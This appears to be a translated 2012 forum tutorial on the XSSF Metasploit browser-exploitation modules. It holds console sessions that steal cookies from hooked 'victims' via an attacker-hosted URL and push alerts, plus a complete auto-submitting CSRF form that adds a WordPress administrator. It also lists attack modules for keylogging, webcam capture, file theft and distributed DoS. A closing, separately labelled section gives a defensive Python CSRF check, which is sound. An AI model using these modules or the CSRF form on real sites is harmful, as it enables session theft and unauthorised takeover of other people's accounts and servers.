206 Rewrite xssf 2
Posted on 2012-10-4 22:20:05
For usage, see the older article: http://www.3g-sec.com/thread-279-1-1.html
Getting cookies
    msf  auxiliary(steal_sdcard_file) > use auxiliary/xssf/public/misc/cookie
    msf  auxiliary(cookie) > exploit

    [*] Auxiliary module execution started, press [CTRL + C] to stop it !
    [*] Using URL: http://5.5.5.2:8080/wfMRaf3

    [+] Remaining victims to attack: [2 (1)]

    [+] Code 'auxiliary/xssf/public/misc/cookie' sent to victim '2'
    [+] Remaining victims to attack: NONE
    [+] Response received from victim '2' from module 'Cookie getter'

Alert pop-up
    msf  auxiliary(cookie) > use auxiliary/xssf/public/misc/alert
    msf  auxiliary(alert) > show options

    Module options (auxiliary/xssf/public/misc/alert):

       Name          Current Setting  Required  Description
       ----          ---------------  --------  -----------
       AlertMessage  XSSF ALERT !     yes       Message you want to send to the victim.
       SRVHOST       5.5.5.2          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
       SRVPORT       8080             yes       The local port to listen on.
       SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
       URIPATH                        no        The URI to use for this exploit (default is random)
       VictimIDs     ALL              yes       IDs of the victims you want to receive the code.\nExamples : 1, 3-5 / ALL / NONE

    msf  auxiliary(alert) > set AlertMessage hacked by Helen
    AlertMessage => hacked by Helen
    msf  auxiliary(alert) > exploit

    [*] Auxiliary module execution started, press [CTRL + C] to stop it !
    [*] Using URL: http://5.5.5.2:8080/qTH1lORMHLNLfL

    [+] Remaining victims to attack: [3 (1)]

    [+] Code 'auxiliary/xssf/public/misc/alert' sent to victim '3'
    [+] Remaining victims to attack: NONE

CSRF
    msf auxiliary(cookie) > use auxiliary/xssf/public/misc/csrf
Reference: http://baike.baidu.com/view/1609487.htm
An example: adding an admin to WordPress
    <html>
    <body onload="javascript:document.forms[0].submit()">
    <H2>CSRF Exploit to add Administrator</H2>
    <form method="POST" name="form0" action="http://<wordpress_ip>:80/wp-admin/user-new.php">
    <input type="hidden" name="action" value="createuser"/>
    <input type="hidden" name="_wpnonce_create-user" value="<sniffed_value>"/>
    <input type="hidden" name="_wp_http_referer" value="%2Fwordpress%2Fwp-admin%2Fuser-new.php"/>
    <input type="hidden" name="user_login" value="admin2"/>
    <input type="hidden" name="email" value="admin2@admin.com"/>
    <input type="hidden" name="first_name" value="admin2@admin.com"/>
    <input type="hidden" name="last_name" value=""/>
    <input type="hidden" name="url" value=""/>
    <input type="hidden" name="pass1" value="password"/>
    <input type="hidden" name="pass2" value="password"/>
    <input type="hidden" name="role" value="administrator"/>
    <input type="hidden" name="createuser" value="Add+New+User+"/>
    </form>
    </body>
    </html>

Local PDF vulnerability
use auxiliary/xssf/public/misc/load_pdf
Generates a file-vulnerability PDF, which is written and run.
Drive-by injection (iframe)
use auxiliary/xssf/public/persistence/iframize
All modules
use auxiliary/xssf/public/android/steal_sdcard_file
use auxiliary/xssf/public/chrome/filejacking
use auxiliary/xssf/public/ie/command
use auxiliary/xssf/public/iphone/skype_call
use auxiliary/xssf/public/misc/alert
use auxiliary/xssf/public/misc/change_interval
use auxiliary/xssf/public/misc/check_connected
use auxiliary/xssf/public/misc/cookie
use auxiliary/xssf/public/misc/csrf
use auxiliary/xssf/public/misc/detect_properties
use auxiliary/xssf/public/misc/get_page
use auxiliary/xssf/public/misc/load_applet
use auxiliary/xssf/public/misc/load_pdf
use auxiliary/xssf/public/misc/logkeys
use auxiliary/xssf/public/misc/prompt
use auxiliary/xssf/public/misc/redirect
use auxiliary/xssf/public/misc/save_page
use auxiliary/xssf/public/misc/tabnapping
use auxiliary/xssf/public/misc/visited_pages
use auxiliary/xssf/public/misc/webcam_capture
use auxiliary/xssf/public/misc/xss_get_bounce
use auxiliary/xssf/public/network/connection_speed
use auxiliary/xssf/public/network/distributed_dos
use auxiliary/xssf/public/network/ie/ipconfig
use auxiliary/xssf/public/network/ms_windows_html5/scan_network
use auxiliary/xssf/public/network/ms_windows_html5/scan_ports
use auxiliary/xssf/public/network/ping
use auxiliary/xssf/public/network/web_services
use auxiliary/xssf/public/old_browsers/bypass_sop_ie6
use auxiliary/xssf/public/old_browsers/trace_method_results
use auxiliary/xssf/public/persistence/ghostify
use auxiliary/xssf/public/persistence/iframize





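Only after playing a thousand tunes can one understand music; only after examining a thousand swords can one recognize a fine blade.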
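The WordPress CSRF form in the post, seen from the server side, as an added example that is not part of the original post and is not WordPress's own code: a gate that requires a same-site Origin/Referer plus a session-bound, expiring token before accepting the POST. The secret, the origin, the session IDs and all function names are assumptions; only the field name `_wpnonce_create-user` and the action `createuser` come from the form above.

```python
import hashlib
import hmac
import time
from urllib.parse import urlsplit

SECRET = b"constructed-demo-key"         # constructed; keep the real key in a secret store
ALLOWED_ORIGIN = "https://blog.example"  # hypothetical origin of the protected site
TOKEN_TTL = 3600                         # seconds a token stays valid


def _mac(session_id, action, ts):
    msg = f"{session_id}|{action}|{ts}".encode()
    return hmac.new(SECRET, msg, hashlib.sha256).hexdigest()


def issue_token(session_id, action, now=None):
    """Return 'timestamp.mac', bound to one session and one action."""
    ts = str(int(time.time() if now is None else now))
    return f"{ts}.{_mac(session_id, action, ts)}"


def token_valid(token, session_id, action, now=None):
    """Reject malformed, expired, future-dated or foreign-session tokens."""
    now = time.time() if now is None else now
    ts, _, mac = token.partition(".")
    if not (ts.isascii() and ts.isdigit() and mac):
        return False
    if not 0 <= now - int(ts) <= TOKEN_TTL:
        return False
    return hmac.compare_digest(mac.encode(), _mac(session_id, action, ts).encode())


def same_origin(headers):
    """Accept only our own origin in Origin or, when absent, Referer."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == ALLOWED_ORIGIN


def allow_create_user(headers, form, session_id, now=None):
    """Gate for the state-changing 'createuser' POST shown in the post."""
    if not same_origin(headers):
        return False, "cross-origin request"
    token = form.get("_wpnonce_create-user", "")
    if not token_valid(token, session_id, "createuser", now):
        return False, "bad or expired token"
    return True, "ok"
```

A token that is valid for the victim's session still fails here when the auto-submitting form is served from another origin, because the browser sets the Origin header itself.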
